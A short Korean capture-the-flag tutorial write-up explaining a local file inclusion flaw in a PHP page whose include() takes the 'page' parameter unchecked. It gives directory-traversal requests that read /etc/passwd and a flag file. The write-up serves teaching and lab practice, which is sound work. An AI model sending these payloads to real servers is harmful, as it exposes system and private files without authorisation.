[Tutorial] session

문제 개요

• 세션 쿠키를 발급받은 뒤 page.php의 include 구문으로 LFI가 가능합니다.

취약점 분석

include("pages/".$_GET['page']);

익스플로잇 절차

1. 로그인하여 PHPSESSID 확보

2. LFI 확인

   /page.php?page=../../../../etc/passwd

3. 플래그 확인

   /page.php?page=../../../../flag.txt

핵심 포인트

디렉터리 트래버설로 루트 경로 접근 가능 여부를 확인합니다.